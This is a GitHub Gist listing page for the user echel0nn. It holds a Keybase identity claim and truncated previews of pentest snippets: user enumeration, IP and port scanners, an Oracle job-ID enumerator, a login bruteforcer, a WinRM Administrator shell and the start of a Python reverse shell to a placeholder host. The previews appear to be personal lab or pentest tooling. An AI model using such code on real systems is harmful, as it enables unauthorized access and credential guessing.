I hereby claim:
- I am echel0nn on github.
- I am echel0n (https://keybase.io/echel0n) on keybase.
- I have a public key whose fingerprint is 6C6D 3048 279E 8BED 359D AD07 2366 DC9F BF9F ED32
To claim this, I am signing this object:
echel0nn
/ keybase.md
Created
July 17, 2019 11:34
echel0nn
/ user_enum.py
Last active
July 31, 2019 08:15
This snippet will enumerate the users, depending on password reset page, if that page says this user not found.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| """ | |
| * *** | |
| ** *** | |
| ** ** | |
| ** ** | |
| ** ** **** | |
| *** **** ** *** *** ** * *** * *** **** |
echel0nn
/ DTE101 - No Auth Recon
Created
November 24, 2019 19:26
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import subprocess | |
| def scanMe(): | |
| f = open("HTTPs","r") | |
| IPS = f.read().split("\n") | |
| for ip in IPS: | |
| OUTPT = subprocess.run("curl 'http://" + str(ip) + "'", shell=True, capture_output=True) | |
| output_real = OUTPT.stdout.__repr__() | |
| if "awe" in output_real: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| import sys | |
| import string | |
| import random | |
| URL = "http://<REPLACE_ME>/SendAccess?IpAddress={IPADDRESS}&MacAddress={MACADDRESS}&RelayTime={RELAYTIME}&MessageLine1={MESSAGELINE1}&MessageLine2={MESSAGELINE2}&MessageLine3={MESSAGELINE3}&MessageLine4={MESSAGELINE4}" | |
| DEF_ERR_STR = "System.InvalidOperationException: The operation is not allowed on non-connected sockets" | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| URL = "http://<REPLACEME>/reports/rwservlet/getjobid<REPLACEME>" | |
| DEF_ERR_STR = "does not exist." | |
| def find(): | |
| ID = 0 | |
| while True: |
echel0nn
/ firewall-test.sh
Created
December 11, 2019 20:06
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| for (( r = 12; r <= 12; ));do | |
| for (( i = 0; i < 10000; i++ )); do | |
| echo -n "IP:"| echo -n 172.16.90.$r && echo | |
| echo -n "Testing Port -> " && echo $i | |
| hping3 -S -c 2 -p $i 176.16.90.$r 2>/dev/null | grep -i "rtt" | |
| done | |
| done | |
| ## lazy |
echel0nn
/ valid-http-connection-checker.py
Created
December 11, 2019 20:08
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # -*- coding: utf-8 -*- | |
| ## lazy | |
| import os | |
| f = open("IPS.txt","r") | |
| ADDPORT= ":8080" |
echel0nn
/ python-reverse-shell-example.py
Created
December 11, 2019 20:10
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import pty | |
| from os import dup2, putenv | |
| import socket | |
| LHOST="HOSTIP" | |
| LPORT="1881" | |
| def FUOVERIT(): | |
| s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
echel0nn
/ WinRM-Shell.rb
Created
December 11, 2019 20:16
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env ruby | |
| require 'winrm' | |
| # Author: Alamot | |
| conn = WinRM::Connection.new( | |
| endpoint: 'http:/<REPLACE_ME>:5985/wsman', | |
| transport: :ssl, | |
| user: 'Administrator', |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import requests | |
| import sys | |
| def bruteforce(USERNAME, PASSWORD, URL): | |
| ERROR_STRING = "Login failed" | |
| # username=&password=&Login=Login&user_token= | |
| COOKIES, USER_TOKEN = setSessionCookie(URL) | |
| post_data = {'username': USERNAME, 'password': PASSWORD, 'Login': 'Login', |
OlderNewer